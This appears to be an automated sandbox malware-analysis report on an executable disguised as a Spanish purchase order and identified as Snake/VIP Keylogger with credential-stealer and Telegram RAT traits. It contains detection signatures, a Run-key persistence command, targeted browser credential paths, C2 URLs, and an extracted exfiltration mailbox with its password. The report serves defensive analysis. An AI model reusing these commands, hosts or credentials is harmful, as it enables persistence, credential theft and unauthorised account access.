0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e672:$s1: UnHook 0x2e679:$s2: SetHook 0x2e681:$s3: CallNextHook 0x2e68e:$s4: _hook
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39a08:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x390ab:$a3: \Google\Chrome\User Data\Default\Login Data 0x39308:$a4: \Orbitum\User Data\Default\Login Data 0x39ce7:$a5: \Kometa\User Data\Default\Login Data
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2da56:$a1: get_encryptedPassword 0x2dd87:$a2: get_encryptedUsername 0x2d866:$a3: get_timePasswordChanged 0x2d96f:$a4: get_passwordField 0x2da6c:$a5: set_encryptedPassword 0x2f0fc:$a7: get_logins 0x2f048:$a10: KeyLoggerEventArgs 0x2ecad:$a11: KeyLoggerEventArgsEventHandler
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c872:$s1: UnHook 0x2c879:$s2: SetHook 0x2c881:$s3: CallNextHook 0x2c88e:$s4: _hook
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b808:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3aeab:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b108:$a4: \Orbitum\User Data\Default\Login Data 0x3bae7:$a5: \Kometa\User Data\Default\Login Data
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e672:$s1: UnHook 0x2e679:$s2: SetHook 0x2e681:$s3: CallNextHook 0x2e68e:$s4: _hook
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bc56:$a1: get_encryptedPassword 0x2bf87:$a2: get_encryptedUsername 0x2ba66:$a3: get_timePasswordChanged 0x2bb6f:$a4: get_passwordField 0x2bc6c:$a5: set_encryptedPassword 0x2d2fc:$a7: get_logins 0x2d248:$a10: KeyLoggerEventArgs 0x2cead:$a11: KeyLoggerEventArgsEventHandler
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39a08:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x390ab:$a3: \Google\Chrome\User Data\Default\Login Data 0x39308:$a4: \Orbitum\User Data\Default\Login Data 0x39ce7:$a5: \Kometa\User Data\Default\Login Data
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c872:$s1: UnHook 0x2c879:$s2: SetHook 0x2c881:$s3: CallNextHook 0x2c88e:$s4: _hook
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bc56:$a1: get_encryptedPassword 0x2bf87:$a2: get_encryptedUsername 0x2ba66:$a3: get_timePasswordChanged 0x2bb6f:$a4: get_passwordField 0x2bc6c:$a5: set_encryptedPassword 0x2d2fc:$a7: get_logins 0x2d248:$a10: KeyLoggerEventArgs 0x2cead:$a11: KeyLoggerEventArgsEventHandler
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39a08:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x390ab:$a3: \Google\Chrome\User Data\Default\Login Data 0x39308:$a4: \Orbitum\User Data\Default\Login Data 0x39ce7:$a5: \Kometa\User Data\Default\Login Data
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c872:$s1: UnHook 0x2c879:$s2: SetHook 0x2c881:$s3: CallNextHook 0x2c88e:$s4: _hook
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2da56:$a1: get_encryptedPassword 0x71216:$a1: get_encryptedPassword 0x2dd87:$a2: get_encryptedUsername 0x71547:$a2: get_encryptedUsername 0x2d866:$a3: get_timePasswordChanged 0x71026:$a3: get_timePasswordChanged 0x2d96f:$a4: get_passwordField 0x7112f:$a4: get_passwordField 0x2da6c:$a5: set_encryptedPassword 0x7122c:$a5: set_encryptedPassword 0x2f0fc:$a7: get_logins 0x728bc:$a7: get_logins 0x2f048:$a10: KeyLoggerEventArgs 0x72808:$a10: KeyLoggerEventArgs 0x2ecad:$a11: KeyLoggerEventArgsEventHandler 0x7246d:$a11: KeyLoggerEventArgsEventHandler
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b808:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7efc8:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3aeab:$a3: \Google\Chrome\User Data\Default\Login Data 0x7e66b:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b108:$a4: \Orbitum\User Data\Default\Login Data 0x7e8c8:$a4: \Orbitum\User Data\Default\Login Data 0x3bae7:$a5: \Kometa\User Data\Default\Login Data 0x7f2a7:$a5: \Kometa\User Data\Default\Login Data
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e672:$s1: UnHook 0x71e32:$s1: UnHook 0x2e679:$s2: SetHook 0x71e39:$s2: SetHook 0x2e681:$s3: CallNextHook 0x71e41:$s3: CallNextHook 0x2e68e:$s4: _hook 0x71e4e:$s4: _hook
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2da56:$a1: get_encryptedPassword 0x71226:$a1: get_encryptedPassword 0xb49e6:$a1: get_encryptedPassword 0x2dd87:$a2: get_encryptedUsername 0x71557:$a2: get_encryptedUsername 0xb4d17:$a2: get_encryptedUsername 0x2d866:$a3: get_timePasswordChanged 0x71036:$a3: get_timePasswordChanged 0xb47f6:$a3: get_timePasswordChanged 0x2d96f:$a4: get_passwordField 0x7113f:$a4: get_passwordField 0xb48ff:$a4: get_passwordField 0x2da6c:$a5: set_encryptedPassword 0x7123c:$a5: set_encryptedPassword 0xb49fc:$a5: set_encryptedPassword 0x2f0fc:$a7: get_logins 0x728cc:$a7: get_logins 0xb608c:$a7: get_logins 0x2f048:$a10: KeyLoggerEventArgs 0x72818:$a10: KeyLoggerEventArgs 0xb5fd8:$a10: KeyLoggerEventArgs
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b808:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7efd8:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc2798:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3aeab:$a3: \Google\Chrome\User Data\Default\Login Data 0x7e67b:$a3: \Google\Chrome\User Data\Default\Login Data 0xc1e3b:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b108:$a4: \Orbitum\User Data\Default\Login Data 0x7e8d8:$a4: \Orbitum\User Data\Default\Login Data 0xc2098:$a4: \Orbitum\User Data\Default\Login Data 0x3bae7:$a5: \Kometa\User Data\Default\Login Data 0x7f2b7:$a5: \Kometa\User Data\Default\Login Data 0xc2a77:$a5: \Kometa\User Data\Default\Login Data
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e672:$s1: UnHook 0x71e42:$s1: UnHook 0xb5602:$s1: UnHook 0x2e679:$s2: SetHook 0x71e49:$s2: SetHook 0xb5609:$s2: SetHook 0x2e681:$s3: CallNextHook 0x71e51:$s3: CallNextHook 0xb5611:$s3: CallNextHook 0x2e68e:$s4: _hook 0x71e5e:$s4: _hook 0xb561e:$s4: _hook
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2da56:$a1: get_encryptedPassword 0x7120c:$a1: get_encryptedPassword 0x2dd87:$a2: get_encryptedUsername 0x7153d:$a2: get_encryptedUsername 0x2d866:$a3: get_timePasswordChanged 0x7101c:$a3: get_timePasswordChanged 0x2d96f:$a4: get_passwordField 0x71125:$a4: get_passwordField 0x2da6c:$a5: set_encryptedPassword 0x71222:$a5: set_encryptedPassword 0x2f0fc:$a7: get_logins 0x728b2:$a7: get_logins 0x2f048:$a10: KeyLoggerEventArgs 0x727fe:$a10: KeyLoggerEventArgs 0x2ecad:$a11: KeyLoggerEventArgsEventHandler 0x72463:$a11: KeyLoggerEventArgsEventHandler
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b808:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7efbe:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3aeab:$a3: \Google\Chrome\User Data\Default\Login Data 0x7e661:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b108:$a4: \Orbitum\User Data\Default\Login Data 0x7e8be:$a4: \Orbitum\User Data\Default\Login Data 0x3bae7:$a5: \Kometa\User Data\Default\Login Data 0x7f29d:$a5: \Kometa\User Data\Default\Login Data
0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e672:$s1: UnHook 0x71e28:$s1: UnHook 0x2e679:$s2: SetHook 0x71e2f:$s2: SetHook 0x2e681:$s3: CallNextHook 0x71e37:$s3: CallNextHook 0x2e68e:$s4: _hook 0x71e44:$s4: _hook
Click to see the 80 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\xload.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7316, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xload

Sigma detected: Direct Autorun Keys Modification

Source: Process started

Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xload" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xload.exe", CommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xload" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xload.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "cmd" /c ping 127.0.0.1 -n 18 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xload" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xload.exe", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7816, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xload" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xload.exe", ProcessId: 7316, ProcessName: reg.exe

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "cmd" /c ping 127.0.0.1 -n 18 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xload" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xload.exe", CommandLine: "cmd" /c ping 127.0.0.1 -n 18 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xload" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xload.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe", ParentImage: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, ParentProcessId: 7556, ParentProcessName: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, ProcessCommandLine: "cmd" /c ping 127.0.0.1 -n 18 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xload" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xload.exe", ProcessId: 7816, ProcessName: cmd.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DesusertionIp: 185.230.214.164, DesusertionIsIpv6: false, DesusertionPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 1072, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49737

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-12T21:07:45.019129+0200	2803305	3	Unknown Traffic	192.168.2.9	49719	188.114.97.3	443	TCP
2024-09-12T21:07:47.824087+0200	2803305	3	Unknown Traffic	192.168.2.9	49723	188.114.97.3	443	TCP
2024-09-12T21:07:55.788996+0200	2803305	3	Unknown Traffic	192.168.2.9	49733	188.114.97.3	443	TCP
2024-09-12T21:08:02.924452+0200	2803305	3	Unknown Traffic	192.168.2.9	49738	188.114.97.3	443	TCP
2024-09-12T21:08:05.574516+0200	2803305	3	Unknown Traffic	192.168.2.9	49742	188.114.97.3	443	TCP
2024-09-12T21:08:06.867038+0200	2803305	3	Unknown Traffic	192.168.2.9	49744	188.114.97.3	443	TCP
2024-09-12T21:08:10.756891+0200	2803305	3	Unknown Traffic	192.168.2.9	49750	188.114.97.3	443	TCP
2024-09-12T21:08:13.333815+0200	2803305	3	Unknown Traffic	192.168.2.9	49752	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-12T21:07:43.145681+0200	2803274	2	Potentially Bad Traffic	192.168.2.9	49717	132.226.247.73	80	TCP
2024-09-12T21:07:44.426949+0200	2803274	2	Potentially Bad Traffic	192.168.2.9	49717	132.226.247.73	80	TCP
2024-09-12T21:07:45.898430+0200	2803274	2	Potentially Bad Traffic	192.168.2.9	49720	132.226.247.73	80	TCP
2024-09-12T21:08:01.333259+0200	2803274	2	Potentially Bad Traffic	192.168.2.9	49735	132.226.247.73	80	TCP
2024-09-12T21:08:02.348950+0200	2803274	2	Potentially Bad Traffic	192.168.2.9	49735	132.226.247.73	80	TCP
2024-09-12T21:08:03.661461+0200	2803274	2	Potentially Bad Traffic	192.168.2.9	49739	132.226.247.73	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://aborters.duckdns.org:8081	URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081	URL Reputation: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\xload.exe

Avira: detection malicious, Label: HEUR/AGEN.1304202

Found malware configuration

Source: 00000011.00000002.2326278811.00000000039A9000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "logs@astonherald.com", "Password": "office12#", "Host": "smtp.zoho.eu", "Port": "587", "Version": "4.4"}
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "logs@astonherald.com", "Password": "office12#", "Host": "smtp.zoho.eu", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\xload.exe

ReversingLabs: Detection: 68%

Multi AV Scanner detection for submitted file

Source: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe

ReversingLabs: Detection: 68%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\xload.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49718 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49736 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49753 version: TLS 1.2

Source: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 00CAF45Dh	20_2_00CAF2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 00CAF45Dh	20_2_00CAF4AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 00CAF45Dh	20_2_00CAF52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 00CAFC19h	20_2_00CAF961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0621E959h	20_2_0621E6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 062131E0h	20_2_06212DC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06210D0Dh	20_2_06210B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06211697h	20_2_06210B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06212C19h	20_2_06212968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0621E0A9h	20_2_0621DE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0621F209h	20_2_0621EF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0621CF49h	20_2_0621CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0621D7F9h	20_2_0621D550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 062131E0h	20_2_06212DC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0621E501h	20_2_0621E258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0621EDB1h	20_2_0621EB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0621F661h	20_2_0621F3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0621FAB9h	20_2_0621F810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	20_2_06210040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0621D3A1h	20_2_0621D0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 062131E0h	20_2_0621310E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0621DC51h	20_2_0621D9A8

Networking

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 18

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.9:49737 -> 185.230.214.164:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
